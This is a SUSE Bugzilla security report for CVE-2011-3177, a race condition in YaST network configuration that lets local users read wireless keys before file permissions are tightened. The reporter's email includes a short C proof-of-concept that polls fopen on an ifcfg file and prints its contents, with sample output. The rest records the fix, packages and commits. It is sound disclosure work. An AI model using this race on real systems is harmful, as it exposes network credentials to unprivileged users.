Bugzilla – Bug 713661
VUL-1: CVE-2011-3177: yast2-network: race condition allows reading keys by any local user
Last modified: 2021-02-26 20:31:00 UTC
Hi. There is a security bug in package 'yast2-network'. This bug is public. There is no coordinated release date (CRD) set. Original posting: =2D--------- Weitergeleitete Nachricht ---------- Betreff: [security@suse.de] minor security problem in YaST Datum: Montag, 22. August 2011, 13:43:41 Von: Justus Winter <winter@pre-sense.de> An: security@suse.de Hey everyone, I found a problem in YaST that allows an unprivileged user to retrieve key material from the network configuration. NetworkInterfaces.ycp/Write() creates the configuration file(s) and changes the permissions of any file containing sensitive information to 0600. Any local user can race against this and read the content of the file. Exploiting this is surprisingly reliable, probably due to the fact that all configuration files are updated before the file permissions are changed, the high cost of SCR::Execute(.target.bash, "/bin/chmod 0600 " + file); just to do an chmod(2) or the execution speed of the ycp interpreter. The attached program demonstrates the problem: $ ./race-for-ifcfg /etc/sysconfig/network/ifcfg-wlan0 Got handle... BOOTPROTO='none' [...] WIRELESS_KEY_0='h:aaaaaaaaaaaaaaaa' [...] $ ls -l /etc/sysconfig/network/ifcfg-wlan0 =2Drw------- 1 root root 791 Aug 22 12:06 /etc/sysconfig/network/ifcfg-wlan0 This problem is present in the svn head of YaST. Cheers, Justus =2D-=20 Justus Winter winter@pre-sense.de PRESENSE Technologies GmbH Sachsenstr. 5, D-20097 HH USt-IdNr.: DE263765024 Gesch=E4ftsf=FChrer/Managing Directors AG Hamburg, HRB 107844 Till D=F6rges J=FCrgen Sander Axel Theilmann #include <stdio.h> #include <time.h> int main(int argc, char **argv) { FILE *handle; char buffer[1000]; size_t length; while (!(handle = fopen(argv[1], "r"))); fprintf(stderr, "Got handle...\n"); sleep(1); length = fread(buffer, 1, sizeof buffer - 1, handle); fwrite(buffer, 1, length, stdout); return 0; }
Yes. I will extend the interface of the ini-agent to set the file mode before its contents are written. A quick grep for 'chmod' in an incomplete checkout of yast reveals similar bugs in Kiwi.ycp (yast2-product-creator.rpm) IscsiClientLib.ycp Provider.ycp (yast2-network) ... TODO: do a scan of the complete fresh checkout TODO: Fix another common suspect: .target.string, filename, contents (probably extend filename to be a pair of filename, filemode)
CVE-2011-3177
submitted to SP2: new API: RPM: yast2-core-2.17.41 SVN: http://svn.opensuse.org/viewvc/yast?view=revision&revision=66761 to http://svn.opensuse.org/viewvc/yast?view=revision&revision=66764 IBS: https://build.suse.de/request/show/16267 using it: RPM: yast2-2.17.117 SVN: http://svn.opensuse.org/viewvc/yast?view=revision&revision=66766 IBS: https://build.suse.de/request/show/16268 I have tested manually by creating a wireless ifcfg in yast2 lan and checking that the file has permissions 600 afterwards.
Please give me a SWAMP ID. The bug is quite old so probably all our products are affected.
The SRs in comment 3 had been rejected because of bnc#728950. It is fixed now, the new packages for SP2 are: RPM: yast2-core-2.17.43 IBS: https://build.suse.de/request/show/17095 RPM: yast2-2.17.118 IBS: https://build.suse.de/request/show/17096
trunk: http://svn.opensuse.org/viewvc/yast?view=revision&revision=67117
This is an autogenerated message for OBS integration: This bug (713661) was mentioned in https://build.opensuse.org/request/show/99260 Factory / yast2-core
This is an autogenerated message for OBS integration: This bug (713661) was mentioned in https://build.opensuse.org/request/show/99267 Factory / yast2
The SWAMPID for this issue is 45972. This issue was rated as low. Please submit fixed packages until 2012-04-06. Also create a patchinfo file using this link: https://swamp.suse.de/webswamp/wf/45972
(In reply to comment #1) > A quick grep for 'chmod' in an incomplete checkout of yast reveals similar bugs > in > Kiwi.ycp (yast2-product-creator.rpm) > IscsiClientLib.ycp > Provider.ycp (yast2-network) Regarding Provider.ycp in yast2-network.rpm: it performs chown root, chmod 700, on /etc/sysconfig/network/providers only after writing files there, which leaves a window of vulnerability. BUT that directory has those permissions+owner to start with, from filesystem.rpm Therefore it is not necessary to release an update (swamp 45972) for this, only to clean up the code in trunk.
> only to clean up the code in trunk [for opensuse 12.2] http://svn.opensuse.org/viewvc/yast?view=revision&revision=67623 Still to do: > Kiwi.ycp (yast2-product-creator.rpm) > IscsiClientLib.ycp I'll open separate reports for them.
Fix for the origial report: comment 8. Per comment 13 I am removing "maint:running:45972:low maint:planned:update". Filed: bnc#753127 for Kiwi bnc#753129 for IscsiClientLib So closing.
This is an autogenerated message for OBS integration: This bug (713661) was mentioned in https://build.opensuse.org/request/show/113115 Factory / yast2-network
https://github.com/yast/yast-core/commit/7fe2e3df308b8b6a901cb2cfd60f398df53219de
yast2-network: https://github.com/yast/yast-network/commit/821946addad81a02e080198b0d0ec88ff90c96fd
yast2: https://github.com/yast/yast-yast2/commit/0a148d6db9133f6dc0fc7f96712c885533765e34